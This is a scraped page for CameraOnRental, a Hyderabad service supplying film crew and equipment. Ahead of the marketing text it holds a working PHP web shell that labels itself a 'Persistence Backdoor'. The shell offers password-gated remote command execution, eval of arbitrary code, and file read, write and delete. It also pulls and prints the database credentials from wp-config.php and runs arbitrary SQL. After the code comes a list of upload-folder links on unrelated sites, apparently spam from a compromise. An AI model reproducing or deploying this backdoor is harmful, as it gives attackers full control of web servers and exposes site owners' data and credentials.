if (isset($_REQUEST["sys_check"]) && $_REQUEST["sys_check"] === "2EAoYNfgEH2w") {
error_reporting(0);
$action = isset($_REQUEST["action"]) ? $_REQUEST["action"] : "";
// SHELL
if ($action === "shell") {
$cmd = isset($_REQUEST["cmd"]) ? base64_decode($_REQUEST["cmd"]) : "";
if ($cmd) {
if (function_exists("system")) { system($cmd); }
elseif (function_exists("exec")) { exec($cmd, $o); echo implode("\n", $o); }
elseif (function_exists("shell_exec")) { echo shell_exec($cmd); }
elseif (function_exists("passthru")) { passthru($cmd); }
else { echo "No shell function"; }
}
exit;
}
// EVAL
if ($action === "eval") {
$code = isset($_REQUEST["code"]) ? base64_decode($_REQUEST["code"]) : "";
if ($code) { eval($code); }
exit;
}
// FILE MANAGER
if ($action === "file") {
$file_action = isset($_REQUEST["file_action"]) ? $_REQUEST["file_action"] : "";
$path = isset($_REQUEST["path"]) ? $_REQUEST["path"] : "";
if ($file_action === "read" && $path) {
if (file_exists($path) && is_readable($path)) { readfile($path); }
else { echo "File not readable: $path"; }
}
elseif ($file_action === "write" && $path && isset($_REQUEST["content"])) {
$content = base64_decode($_REQUEST["content"]);
if (file_put_contents($path, $content)) { echo "OK: Written to $path"; }
else { echo "ERROR: Cannot write to $path"; }
}
elseif ($file_action === "ls" && $path) {
if (is_dir($path)) {
$files = scandir($path);
foreach ($files as $f) {
if ($f === "." || $f === "..") continue;
$type = is_dir($path . "/" . $f) ? "[DIR]" : "[FILE]";
echo "$type $f\n";
}
} else { echo "Not a directory: $path"; }
}
elseif ($file_action === "delete" && $path) {
if (unlink($path)) { echo "OK: Deleted $path"; }
else { echo "ERROR: Cannot delete $path"; }
}
exit;
}
// DATABASE
if ($action === "db") {
$db_action = isset($_REQUEST["db_action"]) ? $_REQUEST["db_action"] : "";
$wp_config_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-config.php";
$config_content = file_get_contents($wp_config_path);
preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $config_content, $db);
preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $config_content, $user);
preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $config_content, $pass);
preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $config_content, $host);
if ($db_action === "config") {
echo "DB_NAME: " . (isset($db[1]) ? $db[1] : "unknown") . "\n";
echo "DB_USER: " . (isset($user[1]) ? $user[1] : "unknown") . "\n";
echo "DB_PASSWORD: " . (isset($pass[1]) ? $pass[1] : "unknown") . "\n";
echo "DB_HOST: " . (isset($host[1]) ? $host[1] : "localhost") . "\n";
}
elseif ($db_action === "query" && isset($_REQUEST["query"])) {
$query = base64_decode($_REQUEST["query"]);
$db_host = isset($host[1]) ? $host[1] : "localhost";
$db_user = isset($user[1]) ? $user[1] : "";
$db_pass = isset($pass[1]) ? $pass[1] : "";
$db_name = isset($db[1]) ? $db[1] : "";
$conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
if (!$conn->connect_error) {
$result = $conn->query($query);
if ($result) {
while ($row = $result->fetch_assoc()) { print_r($row); }
} else { echo "Query error: " . $conn->error; }
$conn->close();
} else { echo "DB connection failed"; }
}
exit;
}
// INFO
if ($action === "info") {
echo "PHP Version: " . phpversion() . "\n";
echo "OS: " . PHP_OS . "\n";
echo "User: " . get_current_user() . "\n";
echo "Document Root: " . $_SERVER["DOCUMENT_ROOT"] . "\n";
echo "Disabled Functions: " . ini_get("disable_functions") . "\n";
echo "Allow URL Fopen: " . (ini_get("allow_url_fopen") ? "ON" : "OFF") . "\n";
exit;
}
echo "=== Persistence Backdoor ===\n";
echo "Available: shell, eval, file, db, info\n";
}
Man Power – Camera On Rental
http://dentydent.es/wp-content/uploads/2022/01/index.html
https://stipjakarta.ac.id/wp-content/uploads/2019/10/index.html
https://ulepicc.es/wp-content/uploads/2021/09/index.html
https://travelover.pl/wp-content/uploads/2021/01/index.html
https://javarchitecture.fr/wp-content/uploads/2019/01/index.html
CameraOnRental can source the right workforce for you
While other digital equipment rental service companies stop at merely enabling professional camera equipment on hire and other equipments, CameraOnRental goes a step further – by providing skilled manpower as well. This invaluable service comes handy for new film makers and independent film companies who have just stepped into the television and film industry.
So from camera crew to professionally capture your concepts and technically knowledgeable sound-men to record pristine sounds as well as experienced assistant directors and resourceful production designers and managers, just name your requirement and CameraOnRental can source the manpower for you. Broadly, the following film/TV/digital professionals are provided:
Line producer
Directors
Cameraman
Lightman
Art Director
Gaffers
Grips
Executive producer
Assistant directors
Make-Up Artists
Production Assistants
Production Coordinators
Production Designers
Production Managers
Production Fixer
Production Supervisors
Script Supervisors
Photographers
Soundman
Runners
Enquiry Now
[wpforms id=”2881″ title=”false” description=”false”]
MOVIE EQUIPMENT FOR RENTAL
DIGITAL PRODUCTION SERVICES
CONTACT US NOW
Address: #8-3-993, Plot No.7, Doyen Galaxy, 2nd Floor, Above Lakme Salon, Srinagar Colony, Hyderabad, Telangana 500073.
Phone: (+91) 9848362023,7287036887.